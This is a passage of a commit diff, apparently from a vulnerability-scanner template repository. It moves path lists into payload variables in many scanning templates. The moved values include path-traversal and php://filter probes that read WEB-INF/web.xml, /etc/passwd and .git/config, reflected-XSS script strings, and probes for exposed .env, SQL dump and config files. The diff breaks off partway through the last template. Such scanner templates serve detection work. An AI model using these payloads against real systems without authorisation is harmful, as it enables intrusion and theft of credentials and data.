feat: convert paths with lots of elements to payloads

http/cves/2013/CVE-2013-3827.yaml

@@ -30,16 +30,19 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
-      - "{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
-      - "{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
-      - "{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
-      - "{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF"
-      - "{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
-      - "{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF"
-      - "{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
-      - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
-      - "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - "/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
+        - "/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
+        - "/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
+        - "/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
+        - "/secureader/javax.faces.resource/web.xml?loc=../WEB-INF"
+        - "/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
+        - "/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF"
+        - "/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
+        - "/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
+        - "/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
 
     stop-at-first-match: true
 

http/cves/2014/CVE-2014-2383.yaml

@@ -34,17 +34,20 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/dompdf.php?input_file=php://filter/resource=/etc/passwd"
-      - "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd"
-      - "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
-      - "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
-      - "{{BaseURL}}/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
-      - "{{BaseURL}}/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
-      - "{{BaseURL}}/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd"
-      - "{{BaseURL}}/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
-      - "{{BaseURL}}/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
-      - "{{BaseURL}}/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
-      - "{{BaseURL}}/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - "/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+        - "/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd"
+        - "/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+        - "/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+        - "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+        - "/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+        - "/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+        - "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+        - "/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+        - "/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
+        - "/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"
 
     stop-at-first-match: true
 

http/cves/2014/CVE-2014-6271.yaml

@@ -32,14 +32,17 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}"
-      - "{{BaseURL}}/cgi-bin/status"
-      - "{{BaseURL}}/cgi-bin/stats"
-      - "{{BaseURL}}/cgi-bin/test"
-      - "{{BaseURL}}/cgi-bin/status/status.cgi"
-      - "{{BaseURL}}/test.cgi"
-      - "{{BaseURL}}/debug.cgi"
-      - "{{BaseURL}}/cgi-bin/test-cgi"
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - ""
+        - "/cgi-bin/status"
+        - "/cgi-bin/stats"
+        - "/cgi-bin/test"
+        - "/cgi-bin/status/status.cgi"
+        - "/test.cgi"
+        - "/debug.cgi"
+        - "/cgi-bin/test-cgi"
 
     stop-at-first-match: true
 

http/cves/2022/CVE-2022-48197.yaml

@@ -32,15 +32,18 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
-      - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
-      - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
-      - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
-      - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
-      - "{{BaseURL}}/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
-      - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
-      - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
-      - "{{BaseURL}}/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - "/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
+        - "/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
+        - "/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
+        - "/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
+        - "/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
+        - "/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
+        - "/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
+        - "/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
+        - "/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"
 
     stop-at-first-match: true
 

http/cves/2023/CVE-2023-6379.yaml

@@ -33,17 +33,20 @@ info:
 http:
   - method: GET
     path:
-      - '{{BaseURL}}/tagebuch/eintraege/index.html?reloaded&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
-      - '{{BaseURL}}/list-editor/index.html?reloaded&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
-      - '{{BaseURL}}/advanced-elements/list/index.html?reloaded&sort=date_asc&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
-      - '{{BaseURL}}/advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
-      - '{{BaseURL}}/lists/compact/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
-      - '{{BaseURL}}/lists/elaborate/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
-      - '{{BaseURL}}/lists/text-tiles/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
-      - '{{BaseURL}}/lists/masonry/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
-      - '{{BaseURL}}/blog/articles/index.html?reloaded&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
-      - '{{BaseURL}}/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842=&InputField-61939054842=1&captcha_token_id=1"><script>alert(document.domain)<%2fscript>ufs5prh3qfe&captchaphrase1939054842=1'
-      - '{{BaseURL}}/content-elements/job-ad/index.html?reloaded&sort=date_desc&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - '/tagebuch/eintraege/index.html?reloaded&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
+        - '/list-editor/index.html?reloaded&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
+        - '/advanced-elements/list/index.html?reloaded&sort=date_asc&page=3">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
+        - '/advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
+        - '/lists/compact/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
+        - '/lists/elaborate/index.html?reloaded&sort=date_desc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
+        - '/lists/text-tiles/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
+        - '/lists/masonry/index.html?reloaded&sort=date_asc&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
+        - '/blog/articles/index.html?reloaded&page=2">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
+        - '/advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842=&InputField-61939054842=1&captcha_token_id=1"><script>alert(document.domain)<%2fscript>ufs5prh3qfe&captchaphrase1939054842=1'
+        - '/content-elements/job-ad/index.html?reloaded&sort=date_desc&page=1">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E'
 
     stop-at-first-match: true
     matchers-condition: and

http/exposed-panels/openam-panel.yaml

@@ -19,26 +19,29 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/openam/XUI"
-      - "{{BaseURL}}/XUI"
-      - "{{BaseURL}}/XUI/#login"
-      - "{{BaseURL}}/UI"
-      - "{{BaseURL}}/sso/XUI"
-      - "{{BaseURL}}/sso/UI"
-      - "{{BaseURL}}/sso/UI/#login"
-      - "{{BaseURL}}/opensso/UI/Login"
-      - "{{BaseURL}}/openam/UI/login"
-      - "{{BaseURL}}/openam/UI/#loginlogin"
-      - "{{BaseURL}}/openam/UI/Login"
-      - "{{BaseURL}}/openam/XUI/Login"
-      - "{{BaseURL}}/openam/XUI/login"
-      - "{{BaseURL}}/openam/XUI/#login"
-      - "{{BaseURL}}/am/UI/Login"
-      - "{{BaseURL}}/am/UI/#login"
-      - "{{BaseURL}}/am/XUI/"
-      - "{{BaseURL}}/am/XUI/Login"
-      - "{{BaseURL}}/am/json/serverinfo/*"
-      - "{{BaseURL}}/openam/json/serverinfo/*"
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - "/openam/XUI"
+        - "/XUI"
+        - "/XUI/#login"
+        - "/UI"
+        - "/sso/XUI"
+        - "/sso/UI"
+        - "/sso/UI/#login"
+        - "/opensso/UI/Login"
+        - "/openam/UI/login"
+        - "/openam/UI/#loginlogin"
+        - "/openam/UI/Login"
+        - "/openam/XUI/Login"
+        - "/openam/XUI/login"
+        - "/openam/XUI/#login"
+        - "/am/UI/Login"
+        - "/am/UI/#login"
+        - "/am/XUI/"
+        - "/am/XUI/Login"
+        - "/am/json/serverinfo/*"
+        - "/openam/json/serverinfo/*"
 
     host-redirects: true
     stop-at-first-match: true

http/exposed-panels/phpmyadmin-panel.yaml

@@ -19,19 +19,22 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}"
-      - "{{BaseURL}}/phpmyadmin/"
-      - "{{BaseURL}}/admin/phpmyadmin/"
-      - "{{BaseURL}}/_phpmyadmin/"
-      - "{{BaseURL}}/administrator/components/com_joommyadmin/phpmyadmin/"
-      - "{{BaseURL}}/apache-default/phpmyadmin/"
-      - "{{BaseURL}}/blog/phpmyadmin/"
-      - "{{BaseURL}}/forum/phpmyadmin/"
-      - "{{BaseURL}}/php/phpmyadmin/"
-      - "{{BaseURL}}/typo3/phpmyadmin/"
-      - "{{BaseURL}}/web/phpmyadmin/"
-      - "{{BaseURL}}/xampp/phpmyadmin/"
-      - "{{BaseURL}}/phpMyAdmin/"
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - ""
+        - "/phpmyadmin/"
+        - "/admin/phpmyadmin/"
+        - "/_phpmyadmin/"
+        - "/administrator/components/com_joommyadmin/phpmyadmin/"
+        - "/apache-default/phpmyadmin/"
+        - "/blog/phpmyadmin/"
+        - "/forum/phpmyadmin/"
+        - "/php/phpmyadmin/"
+        - "/typo3/phpmyadmin/"
+        - "/web/phpmyadmin/"
+        - "/xampp/phpmyadmin/"
+        - "/phpMyAdmin/"
 
     stop-at-first-match: true
     matchers:

http/exposed-panels/webeditors-check-detect.yaml

@@ -18,23 +18,26 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/fckeditor/_samples/default.html"
-      - "{{BaseURL}}/fckeditor/editor/filemanager/connectors/uploadtest.html"
-      - "{{BaseURL}}/ckeditor/samples/"
-      - "{{BaseURL}}/editor/ckeditor/samples/"
-      - "{{BaseURL}}/ckeditor/samples/sample_posteddata.php"
-      - "{{BaseURL}}/editor/ckeditor/samples/sample_posteddata.php"
-      - "{{BaseURL}}/fck/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"
-      - "{{BaseURL}}/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellcheckder.php"
-      - "{{BaseURL}}/plugin/editor/smarteditor2/SmartEditor2Skin.html"
-      - "{{BaseURL}}/js/se2/SmartEditor2.html"
-      - "{{BaseURL}}/nse/SmartEditor2.html"
-      - "{{BaseURL}}/SmartEditor2.html"
-      - "{{BaseURL}}/apps/ckeditor/samples/old/replacebyclass.html"
-      - "{{BaseURL}}/plugin/editor/ckeditor/samples/old/replacebyclass.html"
-      - "{{BaseURL}}/latest/samples/old/replacebyclass.html"
-      - "{{BaseURL}}/Content/ckeditor/samples/old/replacebyclass.html"
-      - "{{BaseURL}}/ckeditor/samples/plugins/htmlwriter/outputhtml.html"
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - "/fckeditor/_samples/default.html"
+        - "/fckeditor/editor/filemanager/connectors/uploadtest.html"
+        - "/ckeditor/samples/"
+        - "/editor/ckeditor/samples/"
+        - "/ckeditor/samples/sample_posteddata.php"
+        - "/editor/ckeditor/samples/sample_posteddata.php"
+        - "/fck/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"
+        - "/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellcheckder.php"
+        - "/plugin/editor/smarteditor2/SmartEditor2Skin.html"
+        - "/js/se2/SmartEditor2.html"
+        - "/nse/SmartEditor2.html"
+        - "/SmartEditor2.html"
+        - "/apps/ckeditor/samples/old/replacebyclass.html"
+        - "/plugin/editor/ckeditor/samples/old/replacebyclass.html"
+        - "/latest/samples/old/replacebyclass.html"
+        - "/Content/ckeditor/samples/old/replacebyclass.html"
+        - "/ckeditor/samples/plugins/htmlwriter/outputhtml.html"
 
     matchers:
       - type: word

http/exposures/apis/swagger-api.yaml

@@ -18,65 +18,68 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/swagger-ui/swagger-ui.js"
-      - "{{BaseURL}}/swagger/swagger-ui.js"
-      - "{{BaseURL}}/swagger-ui.js"
-      - "{{BaseURL}}/swagger/ui/swagger-ui.js"
-      - "{{BaseURL}}/swagger/ui/index"
-      - "{{BaseURL}}/swagger/index.html"
-      - "{{BaseURL}}/swagger-ui.html"
-      - "{{BaseURL}}/swagger/swagger-ui.html"
-      - "{{BaseURL}}/api/swagger-ui.html"
-      - "{{BaseURL}}/api-docs/swagger.json"
-      - "{{BaseURL}}/api-docs/swagger.yaml"
-      - "{{BaseURL}}/api_docs"
-      - "{{BaseURL}}/swagger.json"
-      - "{{BaseURL}}/swagger.yaml"
-      - "{{BaseURL}}/swagger/v1/swagger.json"
-      - "{{BaseURL}}/swagger/v1/swagger.yaml"
-      - "{{BaseURL}}/api/index.html"
-      - "{{BaseURL}}/api/doc"
-      - "{{BaseURL}}/api/docs/"
-      - "{{BaseURL}}/api/swagger.json"
-      - "{{BaseURL}}/api/swagger.yaml"
-      - "{{BaseURL}}/api/swagger.yml"
-      - "{{BaseURL}}/api/swagger/index.html"
-      - "{{BaseURL}}/api/swagger/swagger-ui.html"
-      - "{{BaseURL}}/api/api-docs/swagger.json"
-      - "{{BaseURL}}/api/api-docs/swagger.yaml"
-      - "{{BaseURL}}/api/swagger-ui/swagger.json"
-      - "{{BaseURL}}/api/swagger-ui/swagger.yaml"
-      - "{{BaseURL}}/api/apidocs/swagger.json"
-      - "{{BaseURL}}/api/apidocs/swagger.yaml"
-      - "{{BaseURL}}/api/swagger-ui/api-docs"
-      - "{{BaseURL}}/api/doc.json"
-      - "{{BaseURL}}/api/api-docs"
-      - "{{BaseURL}}/api/apidocs"
-      - "{{BaseURL}}/api/swagger"
-      - "{{BaseURL}}/api/swagger/static/index.html"
-      - "{{BaseURL}}/api/swagger-resources"
-      - "{{BaseURL}}/api/swagger-resources/restservices/v2/api-docs"
-      - "{{BaseURL}}/api/__swagger__/"
-      - "{{BaseURL}}/api/_swagger_/"
-      - "{{BaseURL}}/api/spec/swagger.json"
-      - "{{BaseURL}}/api/spec/swagger.yaml"
-      - "{{BaseURL}}/api/swagger/ui/index"
-      - "{{BaseURL}}/__swagger__/"
-      - "{{BaseURL}}/_swagger_/"
-      - "{{BaseURL}}/api/v1/swagger-ui/swagger.json"
-      - "{{BaseURL}}/api/v1/swagger-ui/swagger.yaml"
-      - "{{BaseURL}}/swagger-resources/restservices/v2/api-docs"
-      - "{{BaseURL}}/api/swagger_doc.json"
-      - "{{BaseURL}}/docu"
-      - "{{BaseURL}}/docs"
-      - "{{BaseURL}}/swagger"
-      - "{{BaseURL}}/api-doc"
-      - "{{BaseURL}}/doc/"
-      - "{{BaseURL}}/swagger-ui/springfox.js"
-      - "{{BaseURL}}/swagger-ui/swagger-ui-standalone-preset.js"
-      - "{{BaseURL}}/swagger-ui/swagger-ui/swagger-ui-bundle.js"
-      - "{{BaseURL}}/webjars/swagger-ui/swagger-ui-bundle.js"
-      - "{{BaseURL}}/webjars/swagger-ui/index.html"
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - "/swagger-ui/swagger-ui.js"
+        - "/swagger/swagger-ui.js"
+        - "/swagger-ui.js"
+        - "/swagger/ui/swagger-ui.js"
+        - "/swagger/ui/index"
+        - "/swagger/index.html"
+        - "/swagger-ui.html"
+        - "/swagger/swagger-ui.html"
+        - "/api/swagger-ui.html"
+        - "/api-docs/swagger.json"
+        - "/api-docs/swagger.yaml"
+        - "/api_docs"
+        - "/swagger.json"
+        - "/swagger.yaml"
+        - "/swagger/v1/swagger.json"
+        - "/swagger/v1/swagger.yaml"
+        - "/api/index.html"
+        - "/api/doc"
+        - "/api/docs/"
+        - "/api/swagger.json"
+        - "/api/swagger.yaml"
+        - "/api/swagger.yml"
+        - "/api/swagger/index.html"
+        - "/api/swagger/swagger-ui.html"
+        - "/api/api-docs/swagger.json"
+        - "/api/api-docs/swagger.yaml"
+        - "/api/swagger-ui/swagger.json"
+        - "/api/swagger-ui/swagger.yaml"
+        - "/api/apidocs/swagger.json"
+        - "/api/apidocs/swagger.yaml"
+        - "/api/swagger-ui/api-docs"
+        - "/api/doc.json"
+        - "/api/api-docs"
+        - "/api/apidocs"
+        - "/api/swagger"
+        - "/api/swagger/static/index.html"
+        - "/api/swagger-resources"
+        - "/api/swagger-resources/restservices/v2/api-docs"
+        - "/api/__swagger__/"
+        - "/api/_swagger_/"
+        - "/api/spec/swagger.json"
+        - "/api/spec/swagger.yaml"
+        - "/api/swagger/ui/index"
+        - "/__swagger__/"
+        - "/_swagger_/"
+        - "/api/v1/swagger-ui/swagger.json"
+        - "/api/v1/swagger-ui/swagger.yaml"
+        - "/swagger-resources/restservices/v2/api-docs"
+        - "/api/swagger_doc.json"
+        - "/docu"
+        - "/docs"
+        - "/swagger"
+        - "/api-doc"
+        - "/doc/"
+        - "/swagger-ui/springfox.js"
+        - "/swagger-ui/swagger-ui-standalone-preset.js"
+        - "/swagger-ui/swagger-ui/swagger-ui-bundle.js"
+        - "/webjars/swagger-ui/swagger-ui-bundle.js"
+        - "/webjars/swagger-ui/index.html"
 
     headers:
       Accept: text/html

http/exposures/backups/sql-dump.yaml

@@ -16,27 +16,30 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/1.sql"
-      - "{{BaseURL}}/backup.sql"
-      - "{{BaseURL}}/database.sql"
-      - "{{BaseURL}}/data.sql"
-      - "{{BaseURL}}/db_backup.sql"
-      - "{{BaseURL}}/dbdump.sql"
-      - "{{BaseURL}}/db.sql"
-      - "{{BaseURL}}/dump.sql"
-      - "{{BaseURL}}/{{Hostname}}.sql"
-      - "{{BaseURL}}/{{Hostname}}_db.sql"
-      - "{{BaseURL}}/localhost.sql"
-      - "{{BaseURL}}/mysqldump.sql"
-      - "{{BaseURL}}/mysql.sql"
-      - "{{BaseURL}}/site.sql"
-      - "{{BaseURL}}/sql.sql"
-      - "{{BaseURL}}/temp.sql"
-      - "{{BaseURL}}/translate.sql"
-      - "{{BaseURL}}/users.sql"
-      - "{{BaseURL}}/www.sql"
-      - "{{BaseURL}}/wp-content/uploads/dump.sql"
-      - "{{BaseURL}}/wp-content/mysql.sql"
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - "/1.sql"
+        - "/backup.sql"
+        - "/database.sql"
+        - "/data.sql"
+        - "/db_backup.sql"
+        - "/dbdump.sql"
+        - "/db.sql"
+        - "/dump.sql"
+        - "/{{Hostname}}.sql"
+        - "/{{Hostname}}_db.sql"
+        - "/localhost.sql"
+        - "/mysqldump.sql"
+        - "/mysql.sql"
+        - "/site.sql"
+        - "/sql.sql"
+        - "/temp.sql"
+        - "/translate.sql"
+        - "/users.sql"
+        - "/www.sql"
+        - "/wp-content/uploads/dump.sql"
+        - "/wp-content/mysql.sql"
 
     headers:
       Range: "bytes=0-3000"

http/exposures/configs/codeigniter-env.yaml

@@ -12,18 +12,21 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/.env"
-      - "{{BaseURL}}/.env.dev.local"
-      - "{{BaseURL}}/.env.development.local"
-      - "{{BaseURL}}/.env.prod.local"
-      - "{{BaseURL}}/.env.production.local"
-      - "{{BaseURL}}/.env.local"
-      - "{{BaseURL}}/.env.example"
-      - "{{BaseURL}}/.env.stage"
-      - "{{BaseURL}}/.env.live"
-      - "{{BaseURL}}/.env_1"
-      - "{{BaseURL}}/.env.old"
-      - "{{BaseURL}}/.env_sample"
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - "/.env"
+        - "/.env.dev.local"
+        - "/.env.development.local"
+        - "/.env.prod.local"
+        - "/.env.production.local"
+        - "/.env.local"
+        - "/.env.example"
+        - "/.env.stage"
+        - "/.env.live"
+        - "/.env_1"
+        - "/.env.old"
+        - "/.env_sample"
 
     matchers-condition: and
     matchers:

http/exposures/configs/deployment-ini.yaml

@@ -18,18 +18,21 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/deployment.ini"
-      - "{{BaseURL}}/deploy.ini"
-      - "{{BaseURL}}/production.ini"
-      - "{{BaseURL}}/prod.ini"
-      - "{{BaseURL}}/deployment.production.ini"
-      - "{{BaseURL}}/deployment.prod.ini"
-      - "{{BaseURL}}/deploy.production.ini"
-      - "{{BaseURL}}/deploy.prod.ini"
-      - "{{BaseURL}}/server.ini"
-      - "{{BaseURL}}/ftp.ini"
-      - "{{BaseURL}}/ftps.ini"
-      - "{{BaseURL}}/sftp.ini"
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - "/deployment.ini"
+        - "/deploy.ini"
+        - "/production.ini"
+        - "/prod.ini"
+        - "/deployment.production.ini"
+        - "/deployment.prod.ini"
+        - "/deploy.production.ini"
+        - "/deploy.prod.ini"
+        - "/server.ini"
+        - "/ftp.ini"
+        - "/ftps.ini"
+        - "/sftp.ini"
 
     stop-at-first-match: true
 

http/exposures/configs/git-config-nginxoffbyslash.yaml

@@ -20,16 +20,19 @@ info:
 http:
   - method: GET
     path:
-      - '{{BaseURL}}/static../.git/config'
-      - '{{BaseURL}}/js../.git/config'
-      - '{{BaseURL}}/images../.git/config'
-      - '{{BaseURL}}/img../.git/config'
-      - '{{BaseURL}}/css../.git/config'
-      - '{{BaseURL}}/assets../.git/config'
-      - '{{BaseURL}}/content../.git/config'
-      - '{{BaseURL}}/events../.git/config'
-      - '{{BaseURL}}/media../.git/config'
-      - '{{BaseURL}}/lib../.git/config'
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
+        - '/static../.git/config'
+        - '/js../.git/config'
+        - '/images../.git/config'
+        - '/img../.git/config'
+        - '/css../.git/config'
+        - '/assets../.git/config'
+        - '/content../.git/config'
+        - '/events../.git/config'
+        - '/media../.git/config'
+        - '/lib../.git/config'
 
     stop-at-first-match: true
     matchers:

http/exposures/configs/github-workflows-disclosure.yaml

@@ -14,33 +14,36 @@ info:
 http:
   - method: GET
     path:
-      - "{{BaseURL}}/.github/workflows/ci.yml"
-      - "{{BaseURL}}/.github/workflows/ci.yaml"
-      - "{{BaseURL}}/.github/workflows/CI.yml"
-      - "{{BaseURL}}/.github/workflows/main.yml"
-      - "{{BaseURL}}/.github/workflows/main.yaml"
-      - "{{BaseURL}}/.github/workflows/build.yml"
-      - "{{BaseURL}}/.github/workflows/build.yaml"
-      - "{{BaseURL}}/.github/workflows/test.yml"
-      - "{{BaseURL}}/.github/workflows/test.yaml"
-      - "{{BaseURL}}/.github/workflows/tests.yml"
-      - "{{BaseURL}}/.github/workflows/tests.yaml"
-      - "{{BaseURL}}/.github/workflows/release.yml"
-      - "{{BaseURL}}/.github/workflows/publish.yml"
-      - "{{BaseURL}}/.github/workflows/deploy.yml"
-      - "{{BaseURL}}/.github/workflows/push.yml"
-      - "{{BaseURL}}/.github/workflows/lint.yml"
-      - "{{BaseURL}}/.github/workflows/coverage.yml"
-      - "{{BaseURL}}/.github/workflows/release.yaml"
-      - "{{BaseURL}}/.github/workflows/pr.yml"
-      - "{{BaseURL}}/.github/workflows/automerge.yml"
-      - "{{BaseURL}}/.github/workflows/docker.yml"
-      - "{{BaseURL}}/.github/workflows/ci-generated.yml"
-      - "{{BaseURL}}/.github/workflows/ci-push.yml"
-      - "{{BaseURL}}/.github/workflows/ci-daily.yml"
-      - "{{BaseURL}}/.github/workflows/ci-issues.yml"
-      - "{{BaseURL}}/.github/workflows/smoosh-status.yml"
-      - "{{BaseURL}}/.github/workflows/snyk.yml"
+      - "{{BaseURL}}{{paths}}"
+    payloads:
+      paths:
